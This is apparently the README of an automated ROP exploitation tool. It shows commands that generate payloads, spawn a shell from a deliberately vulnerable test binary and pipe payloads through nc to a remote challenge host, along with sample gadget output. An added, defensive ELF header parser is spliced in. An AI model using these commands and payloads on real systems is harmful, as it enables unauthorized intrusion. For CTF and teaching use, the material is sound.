All-in-One ROP Exploitation Engine | CTF Weapon | Security Research Tool
ROF automatically analyzes binaries, finds gadgets, builds chains, and delivers working payloads in seconds.
ROF automates the entire ROP exploitation workflow, from binary analysis to working payload generation, in seconds. Designed for CTFs, security research, and hands-on binary exploitation learning.
No more hours of manual gadget hunting. Just run one command and get a shell.
```bash
git clone https://github.com/medaminkh-dev/Raw_Overflow_Forge.git
cd Raw_Overflow_Forge
python3 Raw_Overflow_Forge.py --create-test
```
This automatically:
- Creates a vulnerable test binary packed with useful gadgets
- Analyzes it
- Finds the correct offset
- Generates multiple working exploit payloads
- Gets you a shell!
Traditional ROP exploitation takes hours of repetitive work:
| Step | Manual Time | With ROF |
|---|---|---|
| Binary analysis | 20 mins | Automatic |
| Gadget extraction | 30 mins | 5 seconds |
| Chain construction | 45 mins | Automatic |
| Offset finding | 15 mins | Automatic |
| Payload testing | 20 mins | Instant |
| Total | ~2 hours | ~2 minutes |
ROF turns ROP from a tedious chore into a fast, repeatable weapon.
| Feature | Description | Benefit |
|---|---|---|
| Smart Binary Analysis | Auto-detects ELF/PE, arch, sections, entry point | No manual readelf/objdump |
| Multi-Method Gadget Finder | Pattern search + objdump parsing + Capstone engine | Maximum gadget coverage |
| Intelligent Categorization | Groups gadgets by function (pop rdi, syscall, etc.) | Easy chain building |
| Auto Offset Detection | Finds exact buffer overflow offset automatically | No more cyclic pattern guessing |
| Staged execve Payload | Full shell via read() + execve("/bin/sh") | Reliable shell on real targets |
| win() Exploitation | Detects and calls win() functions automatically | Instant flag in many CTFs |
| Test Binary Generator | Creates perfect ROP training environment | Learn without hunting targets |
| Multiple Payload Types | Simple ROP, win exploit, staged shell | Flexibility for any scenario |
```bash
python3 Raw_Overflow_Forge.py --create-test
```
This creates vuln_test, a binary deliberately full of useful gadgets, and shows you exactly how to exploit it.
Then get a shell:
```bash
(cat staged_execve.bin; echo -ne '/bin/sh\x00'; cat -) | ./vuln_test
```
```bash
# Full automatic mode
python3 Raw_Overflow_Forge.py vulnerable_binary
# Force specific offset
python3 Raw_Overflow_Forge.py vulnerable_binary --offset 136
# Disable .bss usage (for NX-enabled targets)
python3 Raw_Overflow_Forge.py vulnerable_binary --no-bss
```
```bash
python3 Raw_Overflow_Forge.py challenge --offset 72 | nc ctf.example.com 1337
```
```
[+] Analyzing binary: vuln_test
Type: ELF
Architecture: 64-bit
Entry point: 0x40111a
Base address: 0x400000
Size: 16,384 bytes
[+] Extracting gadgets...
[+] Extraction complete: 312 gadgets found
[+] Gadget statistics:
pop_rdi : 12
pop_rsi : 9
pop_rdx : 8
pop_rax : 10
syscall : 5
ret : 145
[+] Complete execve chain can be built!
[+] Payload saved: staged_execve.bin (248 bytes)
[+] Payload saved: simple_rop.bin (96 bytes)
```
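An added example (not part of ROF or its README) showing where the header fields in the analysis output above come from, plus the two facts a defender reads from the same headers to judge whether gadget addresses stay fixed: PIE and a non-executable stack. It handles only 64-bit little-endian ELF; `analyze_elf64` and `build_sample` are hypothetical names and the sample bytes are constructed.

```python
import struct

ET_EXEC, ET_DYN = 2, 3                     # ET_DYN: PIE executable or shared object
PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X = 0x1
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # ELF64 file header, little-endian (64 bytes)
PHDR = struct.Struct("<IIQQQQQQ")          # ELF64 program header (56 bytes)

def analyze_elf64(data: bytes) -> dict:
    """Report header fields plus PIE and NX-stack status for a 64-bit LE ELF."""
    if len(data) < EHDR.size or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only 64-bit little-endian ELF is handled here")
    (_, e_type, e_machine, _, e_entry, e_phoff, _, _, _,
     e_phentsize, e_phnum, _, _, _) = EHDR.unpack_from(data)
    if e_phentsize != PHDR.size or e_phoff + e_phnum * PHDR.size > len(data):
        raise ValueError("program header table is truncated or malformed")
    base, nx_stack = None, False  # no PT_GNU_STACK entry: treat the stack as executable
    for i in range(e_phnum):
        p_type, p_flags, _, p_vaddr, *_ = PHDR.unpack_from(data, e_phoff + i * PHDR.size)
        if p_type == PT_LOAD and (base is None or p_vaddr < base):
            base = p_vaddr            # lowest PT_LOAD address is the image base
        elif p_type == PT_GNU_STACK:
            nx_stack = not (p_flags & PF_X)
    return {"machine": e_machine, "entry": e_entry, "base": base,
            "pie": e_type == ET_DYN, "nx_stack": nx_stack}

def build_sample(e_type, entry, load_vaddr, stack_flags) -> bytes:
    """Constructed test input: header-only ELF64 with one PT_LOAD and one PT_GNU_STACK."""
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)
    ehdr = EHDR.pack(ident, e_type, 62, 1, entry, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, 2, 0, 0, 0)
    load = PHDR.pack(PT_LOAD, 5, 0, load_vaddr, load_vaddr, 0x1000, 0x1000, 0x1000)
    stack = PHDR.pack(PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0x10)
    return ehdr + load + stack

if __name__ == "__main__":
    # Entry and base mirror the sample output above; everything else is constructed.
    weak = analyze_elf64(build_sample(ET_EXEC, 0x40111A, 0x400000, 7))
    hard = analyze_elf64(build_sample(ET_DYN, 0x111A, 0x0, 6))
    for name, r in (("non-PIE, exec stack", weak), ("PIE, NX stack", hard)):
        print(f"{name}: entry={r['entry']:#x} base={r['base']:#x} "
              f"pie={r['pie']} nx_stack={r['nx_stack']}")
```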
ROF is designed to teach ROP, not hide it:
- Shows exact gadget addresses and disassembly
- Explains each step clearly
- Provides perfect training binary
- Demonstrates real exploitation techniques
Perfect for:
- CTF beginners learning ROP
- Security students
- Pentesters expanding into binary exploitation
- Researchers prototyping exploits
```
Raw_Overflow_Forge/
├── Raw_Overflow_Forge.py   # Main engine (pure Python)
├── vuln_test.c             # Source for test binary
├── examples/               # Sample challenges
├── staged_execve.bin       # Generated payloads
├── win_exploit.bin
└── simple_rop.bin
```
Dependencies: Only standard Python + optional Capstone (pip install capstone)
ROF is strictly for:
- ✅ CTF competitions
- ✅ Authorized security testing
- ✅ Educational purposes
- ✅ Security research
NOT for:
- ❌ Unauthorized system access
- ❌ Malicious activities
- ❌ Attacking production systems
Use responsibly. Knowledge is power; wield it ethically.
Contributions welcome! Help make ROP more accessible:
- Report bugs
- Suggest new features
- Improve gadget detection
- Add Windows PE support
- Create more example challenges
MIT License: free to use, modify, and distribute.
If ROF helps you win a CTF, learn ROP, or level up your skills, give it a star!
```bash
python3 Raw_Overflow_Forge.py --create-test
```
Happy Hacking! 🏴‍☠️
ROF: Turning hours of ROP grinding into minutes of pure exploitation.